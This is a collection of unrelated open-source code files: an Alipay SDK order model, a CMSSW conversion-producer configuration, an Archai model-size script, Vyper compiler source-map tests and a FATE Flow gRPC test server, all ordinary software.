return self._order_status
@order_status.setter
def order_status(self, value):
self._order_status = value
@property
def outer_order_id(self):
return self._outer_order_id
@outer_order_id.setter
def outer_order_id(self, value):
self._outer_order_id = value
@property
def pay_amount(self):
return self._pay_amount
@pay_amount.setter
def pay_amount(self, value):
self._pay_amount = value
@property
def payment_method(self):
return self._payment_method
@payment_method.setter
def payment_method(self, value):
self._payment_method = value
@property
def refund_amount(self):
return self._refund_amount
@refund_amount.setter
def refund_amount(self, value):
self._refund_amount = value
@property
def refund_status(self):
return self._refund_status
@refund_status.setter
def refund_status(self, value):
self._refund_status = value
@property
def refund_ticket_num(self):
return self._refund_ticket_num
@refund_ticket_num.setter
def refund_ticket_num(self, value):
self._refund_ticket_num = value
@property
def refund_time(self):
return self._refund_time
@refund_time.setter
def refund_time(self, value):
self._refund_time = value
@property
def ticket_info(self):
return self._ticket_info
@ticket_info.setter
def ticket_info(self, value):
if isinstance(value, list):
self._ticket_info = list()
for i in value:
if isinstance(i, ScenicTrafficTicketInfo):
self._ticket_info.append(i)
else:
self._ticket_info.append(ScenicTrafficTicketInfo.from_alipay_dict(i))
@property
def trade_no(self):
return self._trade_no
@trade_no.setter
def trade_no(self, value):
self._trade_no = value
@property
def uid(self):
return self._uid
@uid.setter
def uid(self, value):
self._uid = value
def to_alipay_dict(self):
params = dict()
if self.amount:
if hasattr(self.amount, 'to_alipay_dict'):
params['amount'] = self.amount.to_alipay_dict()
else:
params['amount'] = self.amount
if self.app_name:
if hasattr(self.app_name, 'to_alipay_dict'):
params['app_name'] = self.app_name.to_alipay_dict()
else:
params['app_name'] = self.app_name
if self.appid:
if hasattr(self.appid, 'to_alipay_dict'):
params['appid'] = self.appid.to_alipay_dict()
else:
params['appid'] = self.appid
if self.contact:
if hasattr(self.contact, 'to_alipay_dict'):
params['contact'] = self.contact.to_alipay_dict()
else:
params['contact'] = self.contact
if self.discount_amount:
if hasattr(self.discount_amount, 'to_alipay_dict'):
params['discount_amount'] = self.discount_amount.to_alipay_dict()
else:
params['discount_amount'] = self.discount_amount
if self.ext_info:
if hasattr(self.ext_info, 'to_alipay_dict'):
params['ext_info'] = self.ext_info.to_alipay_dict()
else:
params['ext_info'] = self.ext_info
if self.order_create_time:
if hasattr(self.order_create_time, 'to_alipay_dict'):
params['order_create_time'] = self.order_create_time.to_alipay_dict()
else:
params['order_create_time'] = self.order_create_time
if self.order_id:
if hasattr(self.order_id, 'to_alipay_dict'):
params['order_id'] = self.order_id.to_alipay_dict()
else:
params['order_id'] = self.order_id
if self.order_link:
if hasattr(self.order_link, 'to_alipay_dict'):
params['order_link'] = self.order_link.to_alipay_dict()
else:
params['order_link'] = self.order_link
if self.order_modified_time:
if hasattr(self.order_modified_time, 'to_alipay_dict'):
params['order_modified_time'] = self.order_modified_time.to_alipay_dict()
else:
params['order_modified_time'] = self.order_modified_time
if self.order_pay_time:
if hasattr(self.order_pay_time, 'to_alipay_dict'):
params['order_pay_time'] = self.order_pay_time.to_alipay_dict()
else:
params['order_pay_time'] = self.order_pay_time
if self.order_source:
if hasattr(self.order_source, 'to_alipay_dict'):
params['order_source'] = self.order_source.to_alipay_dict()
else:
params['order_source'] = self.order_source
if self.order_status:
if hasattr(self.order_status, 'to_alipay_dict'):
params['order_status'] = self.order_status.to_alipay_dict()
else:
params['order_status'] = self.order_status
if self.outer_order_id:
if hasattr(self.outer_order_id, 'to_alipay_dict'):
params['outer_order_id'] = self.outer_order_id.to_alipay_dict()
else:
params['outer_order_id'] = self.outer_order_id
if self.pay_amount:
if hasattr(self.pay_amount, 'to_alipay_dict'):
params['pay_amount'] = self.pay_amount.to_alipay_dict()
else:
params['pay_amount'] = self.pay_amount
if self.payment_method:
if hasattr(self.payment_method, 'to_alipay_dict'):
params['payment_method'] = self.payment_method.to_alipay_dict()
else:
params['payment_method'] = self.payment_method
if self.refund_amount:
if hasattr(self.refund_amount, 'to_alipay_dict'):
params['refund_amount'] = self.refund_amount.to_alipay_dict()
else:
params['refund_amount'] = self.refund_amount
if self.refund_status:
if hasattr(self.refund_status, 'to_alipay_dict'):
params['refund_status'] = self.refund_status.to_alipay_dict()
else:
params['refund_status'] = self.refund_status
if self.refund_ticket_num:
if hasattr(self.refund_ticket_num, 'to_alipay_dict'):
params['refund_ticket_num'] = self.refund_ticket_num.to_alipay_dict()
else:
params['refund_ticket_num'] = self.refund_ticket_num
if self.refund_time:
if hasattr(self.refund_time, 'to_alipay_dict'):
params['refund_time'] = self.refund_time.to_alipay_dict()
else:
params['refund_time'] = self.refund_time
if self.ticket_info:
if isinstance(self.ticket_info, list):
for i in range(0, len(self.ticket_info)):
element = self.ticket_info[i]
if hasattr(element, 'to_alipay_dict'):
self.ticket_info[i] = element.to_alipay_dict()
if hasattr(self.ticket_info, 'to_alipay_dict'):
params['ticket_info'] = self.ticket_info.to_alipay_dict()
else:
params['ticket_info'] = self.ticket_info
if self.trade_no:
if hasattr(self.trade_no, 'to_alipay_dict'):
params['trade_no'] = self.trade_no.to_alipay_dict()
else:
params['trade_no'] = self.trade_no
if self.uid:
if hasattr(self.uid, 'to_alipay_dict'):
params['uid'] = self.uid.to_alipay_dict()
else:
params['uid'] = self.uid
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayBusinessOrderScenicTrafficSyncModel()
if 'amount' in d:
o.amount = d['amount']
if 'app_name' in d:
o.app_name = d['app_name']
if 'appid' in d:
o.appid = d['appid']
if 'contact' in d:
o.contact = d['contact']
if 'discount_amount' in d:
o.discount_amount = d['discount_amount']
if 'ext_info' in d:
o.ext_info = d['ext_info']
if 'order_create_time' in d:
o.order_create_time = d['order_create_time']
if 'order_id' in d:
o.order_id = d['order_id']
if 'order_link' in d:
o.order_link = d['order_link']
if 'order_modified_time' in d:
o.order_modified_time = d['order_modified_time']
if 'order_pay_time' in d:
o.order_pay_time = d['order_pay_time']
if 'order_source' in d:
o.order_source = d['order_source']
if 'order_status' in d:
o.order_status = d['order_status']
if 'outer_order_id' in d:
o.outer_order_id = d['outer_order_id']
if 'pay_amount' in d:
o.pay_amount = d['pay_amount']
if 'payment_method' in d:
o.payment_method = d['payment_method']
if 'refund_amount' in d:
o.refund_amount = d['refund_amount']
if 'refund_status' in d:
o.refund_status = d['refund_status']
if 'refund_ticket_num' in d:
o.refund_ticket_num = d['refund_ticket_num']
if 'refund_time' in d:
o.refund_time = d['refund_time']
if 'ticket_info' in d:
o.ticket_info = d['ticket_info']
if 'trade_no' in d:
o.trade_no = d['trade_no']
if 'uid' in d:
o.uid = d['uid']
return o
|
RecoEgamma/EgammaPhotonProducers/python/allConversions_cfi.py
|
ckamtsikis/cmssw
| 852 |
70708
|
<reponame>ckamtsikis/cmssw<filename>RecoEgamma/EgammaPhotonProducers/python/allConversions_cfi.py
import FWCore.ParameterSet.Config as cms
allConversions = cms.EDProducer('ConversionProducer',
AlgorithmName = cms.string('mixed'),
#src = cms.VInputTag(cms.InputTag("generalTracks")),
src = cms.InputTag("gsfGeneralInOutOutInConversionTrackMerger"),
convertedPhotonCollection = cms.string(''), ## or empty
bcEndcapCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALEndcap'),
bcBarrelCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALBarrel'),
scBarrelProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALBarrel'),
scEndcapProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALEndcapWithPreshower'),
primaryVertexProducer = cms.InputTag('offlinePrimaryVerticesWithBS'),
deltaEta = cms.double(0.4), #track pair search range in eta (applied even in case of preselection bypass)
HalfwayEta = cms.double(.1),# Track-bc matching search range on Eta
maxNumOfTrackInPU = cms.int32(999999),
maxTrackRho = cms.double(120.),
maxTrackZ = cms.double(300.),
minSCEt = cms.double(10.0),
dEtacutForSCmatching = cms.double(0.03),
dPhicutForSCmatching = cms.double(0.05),
dEtaTrackBC = cms.double(.2), # Track-Basic cluster matching, position diff on eta
dPhiTrackBC = cms.double(1.), # Track-Basic cluster matching, position diff on phi
EnergyBC = cms.double(0.3), # Track-Basic cluster matching, BC energy lower cut
EnergyTotalBC = cms.double(.3), # Track-Basic cluster matching, two BC energy summation cut
#tight cuts
d0 = cms.double(0.), #d0*charge cut
MaxChi2Left = cms.double(10.), #Track quality
MaxChi2Right = cms.double(10.),
MinHitsLeft = cms.int32(4),
MinHitsRight = cms.int32(2),
DeltaCotTheta = cms.double(0.1), #Track pair opening angle on R-Z
DeltaPhi = cms.double(.2), #Track pair opening angle on X-Y (not a final selection cut)
vtxChi2 = cms.double(0.0005),
MinApproachLow = cms.double(-.25), #Track pair min distance at approaching point on X-Y
MinApproachHigh = cms.double(1.0), #Track pair min distance at approaching point on X-Y
rCut = cms.double(2.0),#analytical track cross point
dz = cms.double(5.0),#track pair inner position difference
# kinematic vertex fit parameters
maxDelta = cms.double(0.01),#delta of parameters
maxReducedChiSq = cms.double(225.),#maximum chi^2 per degree of freedom before fit is terminated
minChiSqImprovement = cms.double(50.),#threshold for "significant improvement" in the fit termination logic
maxNbrOfIterations = cms.int32(40),#maximum number of convergence iterations
UsePvtx = cms.bool(True),
AllowD0 = cms.bool(True), #Allow d0*charge cut
AllowDeltaPhi = cms.bool(False),
AllowTrackBC = cms.bool(False), #Allow to match track-basic cluster
AllowDeltaCot = cms.bool(True), #Allow pairing using delta cot theta cut
AllowMinApproach = cms.bool(True), #Allow pairing using min approach cut
AllowOppCharge = cms.bool(True), #use opposite charge tracks to pair
AllowVertex = cms.bool(True),
bypassPreselGsf = cms.bool(True), #bypass preselection for gsf + X pairs
bypassPreselEcal = cms.bool(False), #bypass preselection for ecal-seeded + X pairs
bypassPreselEcalEcal = cms.bool(True), #bypass preselection for ecal-seeded + ecal-seeded pairs
AllowSingleLeg = cms.bool(False), #Allow single track conversion
AllowRightBC = cms.bool(False) #Require second leg matching basic cluster
)
from Configuration.Eras.Modifier_phase2_hgcal_cff import phase2_hgcal
phase2_hgcal.toModify( allConversions, bypassPreselGsf = False )
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(allConversions, src = 'gsfGeneralConversionTrackMerger')
|
scripts/perf/model_size.py
|
cclauss/archai
| 344 |
70711
|
<filename>scripts/perf/model_size.py
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from archai.nas.model_desc import ModelDesc
from archai.common.common import common_init
from archai.nas.model import Model
from archai.algos.petridish.petridish_model_desc_builder import PetridishModelBuilder
from archai.common.model_summary import summary
conf = common_init(config_filepath='confs/petridish_cifar.yaml',
param_args=['--common.experiment_name', 'petridish_run2_seed42_eval'])
conf_eval = conf['nas']['eval']
conf_model_desc = conf_eval['model_desc']
conf_model_desc['n_cells'] = 14
template_model_desc = ModelDesc.load('$expdir/final_model_desc.yaml')
model_builder = PetridishModelBuilder()
model_desc = model_builder.build(conf_model_desc, template=template_model_desc)
mb = PetridishModelBuilder()
model = Model(model_desc, droppath=False, affine=False)
summary(model, [64, 3, 32, 32])
exit(0)
|
tests/compiler/test_source_map.py
|
upgradvisor/vyper
| 1,471 |
70713
|
<filename>tests/compiler/test_source_map.py
from vyper.compiler import compile_code
from vyper.compiler.output import _compress_source_map
from vyper.compiler.utils import expand_source_map
TEST_CODE = """
@internal
def _baz(a: int128) -> int128:
b: int128 = a
for i in range(2, 5):
b *= i
if b > 31337:
break
return b
@internal
def _bar(a: uint256) -> bool:
if a > 42:
return True
return False
@external
def foo(a: uint256) -> int128:
if self._bar(a):
return self._baz(2)
else:
return 42
"""
def test_jump_map():
source_map = compile_code(TEST_CODE, ["source_map"])["source_map"]
pos_map = source_map["pc_pos_map"]
jump_map = source_map["pc_jump_map"]
assert len([v for v in jump_map.values() if v == "o"]) == 1
assert len([v for v in jump_map.values() if v == "i"]) == 2
code_lines = [i + "\n" for i in TEST_CODE.split("\n")]
for pc in [k for k, v in jump_map.items() if v == "o"]:
lineno, col_offset, _, end_col_offset = pos_map[pc]
assert code_lines[lineno - 1][col_offset:end_col_offset].startswith("return")
for pc in [k for k, v in jump_map.items() if v == "i"]:
lineno, col_offset, _, end_col_offset = pos_map[pc]
assert code_lines[lineno - 1][col_offset:end_col_offset].startswith("self.")
def test_pos_map_offsets():
source_map = compile_code(TEST_CODE, ["source_map"])["source_map"]
expanded = expand_source_map(source_map["pc_pos_map_compressed"])
pc_iter = iter(source_map["pc_pos_map"][i] for i in sorted(source_map["pc_pos_map"]))
jump_iter = iter(source_map["pc_jump_map"][i] for i in sorted(source_map["pc_jump_map"]))
code_lines = [i + "\n" for i in TEST_CODE.split("\n")]
for item in expanded:
if item[-1] is not None:
assert next(jump_iter) == item[-1]
if item[:2] != [-1, -1]:
start, length = item[:2]
lineno, col_offset, end_lineno, end_col_offset = next(pc_iter)
assert code_lines[lineno - 1][col_offset] == TEST_CODE[start]
assert length == (
sum(len(i) for i in code_lines[lineno - 1 : end_lineno])
- col_offset
- (len(code_lines[end_lineno - 1]) - end_col_offset)
)
def test_compress_source_map():
code = """
@external
def foo() -> uint256:
return 42
"""
compressed = _compress_source_map(
code, {"0": None, "2": (2, 0, 4, 13), "3": (2, 0, 2, 8), "5": (2, 0, 2, 8)}, {"3": "o"}, 2
)
assert compressed == "-1:-1:2:-;1:45;:8::o;;"
def test_expand_source_map():
compressed = "-1:-1:0:-;;13:42:1;:21;::0:o;:::-;1::1;"
expanded = [
[-1, -1, 0, "-"],
[-1, -1, 0, None],
[13, 42, 1, None],
[13, 21, 1, None],
[13, 21, 0, "o"],
[13, 21, 0, "-"],
[1, 21, 1, None],
]
assert expand_source_map(compressed) == expanded
|
python/fate_flow/tests/grpc/server.py
|
hubert-he/FATE
| 3,787 |
70736
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
import requests
from grpc._cython import cygrpc
from fate_arch.common.base_utils import json_dumps, json_loads
from fate_flow.entity.runtime_config import RuntimeConfig
from fate_flow.settings import FATEFLOW_SERVICE_NAME, HEADERS, DEFAULT_REMOTE_REQUEST_TIMEOUT
from fate_flow.settings import IP, GRPC_PORT, stat_logger
from fate_flow.utils.proto_compatibility import basic_meta_pb2
from fate_flow.utils.proto_compatibility import proxy_pb2
from fate_flow.utils.proto_compatibility import proxy_pb2_grpc
import time
import sys
from fate_flow.tests.grpc.xthread import ThreadPoolExecutor
def wrap_grpc_packet(json_body, http_method, url, src_party_id, dst_party_id, job_id=None, overall_timeout=DEFAULT_REMOTE_REQUEST_TIMEOUT):
_src_end_point = basic_meta_pb2.Endpoint(ip=IP, port=GRPC_PORT)
_src = proxy_pb2.Topic(name=job_id, partyId="{}".format(src_party_id), role=FATEFLOW_SERVICE_NAME, callback=_src_end_point)
_dst = proxy_pb2.Topic(name=job_id, partyId="{}".format(dst_party_id), role=FATEFLOW_SERVICE_NAME, callback=None)
_task = proxy_pb2.Task(taskId=job_id)
_command = proxy_pb2.Command(name=FATEFLOW_SERVICE_NAME)
_conf = proxy_pb2.Conf(overallTimeout=overall_timeout)
_meta = proxy_pb2.Metadata(src=_src, dst=_dst, task=_task, command=_command, operator=http_method, conf=_conf)
_data = proxy_pb2.Data(key=url, value=bytes(json_dumps(json_body), 'utf-8'))
return proxy_pb2.Packet(header=_meta, body=_data)
def get_url(_suffix):
return "http://{}:{}/{}".format(RuntimeConfig.JOB_SERVER_HOST, RuntimeConfig.HTTP_PORT, _suffix.lstrip('/'))
class UnaryService(proxy_pb2_grpc.DataTransferServiceServicer):
def unaryCall(self, _request, context):
packet = _request
header = packet.header
_suffix = packet.body.key
param_bytes = packet.body.value
param = bytes.decode(param_bytes)
job_id = header.task.taskId
src = header.src
dst = header.dst
method = header.operator
param_dict = json_loads(param)
param_dict['src_party_id'] = str(src.partyId)
source_routing_header = []
for key, value in context.invocation_metadata():
source_routing_header.append((key, value))
stat_logger.info(f"grpc request routing header: {source_routing_header}")
param = bytes.decode(bytes(json_dumps(param_dict), 'utf-8'))
action = getattr(requests, method.lower(), None)
if action:
print(_suffix)
#resp = action(url=get_url(_suffix), data=param, headers=HEADERS)
else:
pass
#resp_json = resp.json()
resp_json = {"status": "test"}
import time
print("sleep")
time.sleep(60)
return wrap_grpc_packet(resp_json, method, _suffix, dst.partyId, src.partyId, job_id)
thread_pool_executor = ThreadPoolExecutor(max_workers=5)
print(f"start grpc server pool on {thread_pool_executor._max_workers} max workers")
server = grpc.server(thread_pool_executor,
options=[(cygrpc.ChannelArgKey.max_send_message_length, -1),
(cygrpc.ChannelArgKey.max_receive_message_length, -1)])
proxy_pb2_grpc.add_DataTransferServiceServicer_to_server(UnaryService(), server)
server.add_insecure_port("{}:{}".format("127.0.0.1", 7777))
server.start()
try:
while True:
time.sleep(60 * 60 * 24)
except KeyboardInterrupt:
server.stop(0)
sys.exit(0)
|